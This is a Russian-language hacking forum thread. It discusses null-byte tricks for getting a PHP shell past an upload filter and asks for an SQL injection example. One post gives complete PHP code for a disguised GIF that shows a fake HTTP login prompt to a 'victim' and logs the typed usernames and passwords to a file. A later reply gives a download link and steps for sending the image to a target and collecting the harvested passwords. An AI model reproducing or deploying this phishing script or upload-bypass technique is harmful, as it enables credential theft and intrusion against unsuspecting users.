Не помогает(хотя была такая идея но и не помогает она после того как я испробывал)... Так как переиминовывается почему то в my.php%2500.jpg

Странно, только что погонял локально с помощью такой формы:

Всё загружается как есть, php не прокатит, т.е. в итоге если загрузил 5.php%00.jpg - то локально так файл называться и будет, если загрузил 5.php%2500.jpg - то локально так файло называться и будет, в браузере есс-но не отображается - пишет
Т.е. при обращению по урл - да, разрешние второе обрезается, в случае сохранения %00.jpg, а вот откуда там берется %2500.jpg - непонятно, возможно не весь код показал

Так что не получиться, разрешение четко отсекает, если не jpg - гуляй Василий

ЗЫЖ Ну по крайней мере это мой мнение

Тестил при всяких маджиках и он и офф - одна фигня. Если только локальный инклуд, он так можно и просто в картинку код запихать

Pashkela, ты не прав... теория это конечно хорошо, но практика важнее. Когда ты перехватываешь данные с помощью Tamper Data и вставляешь %00 в имя файла, ты забываешь, что это не GET а POST данные, другими словами когда ты вставил %00 надо еще раскодировать данные (правой кнопкой на названии массива и в полученной менюшке пункт раскодировать)

__________________
Карфаген должен быть разрушен...

2 Scipio:

Непонятно что-то, объясни тупому, ну тыкнул на POST_DATA, нажал раскодировать, и что дальше? Можно шелл залить? Ты имеешь в виду, что делается urldecode? И что это нам может дать? Ну вставил туда %00 или наоборот убрал - проверяется все равно позже в данном конкретном примере. Чото недогоняю

Не, понятно, что принцип как у Шанкара в сплойте для PHPBB примерно, только все равно не понятно. На пальцах бы объяснить

РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!



Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!

Народ а тема c php кодом в .gif файле больше не работает ? чтобы вместе с картинкой авторизация вылетала...
<?
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('mellow.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="http://victim/ - Login"');
}
elseif($login)
{
//ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Staratel, изменять даных в инъекциях нельзя.
piton, все работает. Надо только правильно настроить.

настроил и файл .htaccess и тд раньшевсе работало а щас ниодин браузер не понимает.

Вот, держи: http://bestquest.info/other/image.zip

Инструкция:
1. Заливаешь на хост.
2. Ставишь CHMOD 777 на папку, CHMOD 755 на скрипт.
3. Кидаешь ссылку кому-то на image.gif.
4. Если юзерр ввел пасс > 4 символа, смотришь файл passwords.txt (он создастся при вводе пароля).